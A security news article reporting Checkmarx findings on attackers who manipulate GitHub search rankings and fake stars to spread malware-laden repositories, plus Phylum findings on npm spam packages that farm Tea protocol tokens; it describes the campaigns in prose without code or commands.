Threat actors are now exploiting GitHub’s search capabilities to trick unsuspecting users looking for popular repositories into downloading fake counterparts serving malware.
In a report shared with The Hacker News, Checkmarx said that the latest attack on the open source software supply chain involves hiding malicious code in Microsoft Visual Code project files, which is designed to download the next stage of the payload from a remote URL.
“Attackers create malicious repositories using popular names and themes, using techniques such as automatic updates and fake stars to boost search rankings and deceive users,” said security researcher Yehuda Gelb.
The idea is to manipulate search rankings in GitHub, placing threat actor-controlled repositories at the top as users filter and sort results based on latest updates, and adding fake stars via fake accounts to boost popularity.
In the process, the attacks give scam repositories a veneer of legitimacy and trust, effectively tricking developers into downloading them.
“Compared to past incidents where attackers have been seen adding hundreds or thousands of stars to their repositories, in these cases the attackers appear to have chosen a smaller number of stars, possibly to avoid inflated numbers from raising suspicion,” Gelb said.
It’s worth pointing out that previous research by Checkmarx late last year uncovered a black market consisting of online shops and chat groups that were selling GitHub stars to artificially increase the popularity of repositories, a technique that Known as star bulge.
What’s more, most of these repositories are disguised as legitimate projects related to popular games, cheats, and tools, adding another layer of complexity that makes it harder to distinguish them from benign code.
It was observed that some repositories downloaded an encrypted .7z file containing an executable called “feedbackAPI.exe” that had ballooned to 750 MB, possibly to evade anti-virus scans and ultimately launch with Keyzetsu Clipper Similar malware.
This Windows malware was exposed early last year and is usually spread through pirated software such as Evernote. It is able to transfer cryptocurrency transactions to an attacker-owned wallet by replacing the wallet address copied in the clipboard.
The findings highlight the due diligence developers must follow when downloading source code from open source repositories, not to mention the dangers of relying solely on reputation as a metric for assessing trustworthiness.
“The use of malicious GitHub repositories to distribute malware is an ongoing trend that poses a significant threat to the open source ecosystem,” Gelb said.
“By exploiting GitHub’s search capabilities and manipulating repository properties, attackers can lure unsuspecting users into downloading and executing malicious code.”
Meanwhile, Phylum said it has seen an increase in the number of spam (i.e. non-malicious) packages posted to the npm registry by a user named ylmin in order to orchestrate “large-scale automated cryptocurrency mining campaigns” that abuse the Tea protocol. .
The company’s research team said: “The Tea protocol is a web3 platform with the stated goal of compensating open source package maintainers, but instead of receiving cash rewards, they receive TEA tokens (a cryptocurrency).”
“The Tea protocol is not yet live. These users earn points from an ‘incentivized testnet,’ apparently hoping that having more points in the testnet will increase their odds of receiving subsequent airdrops.”
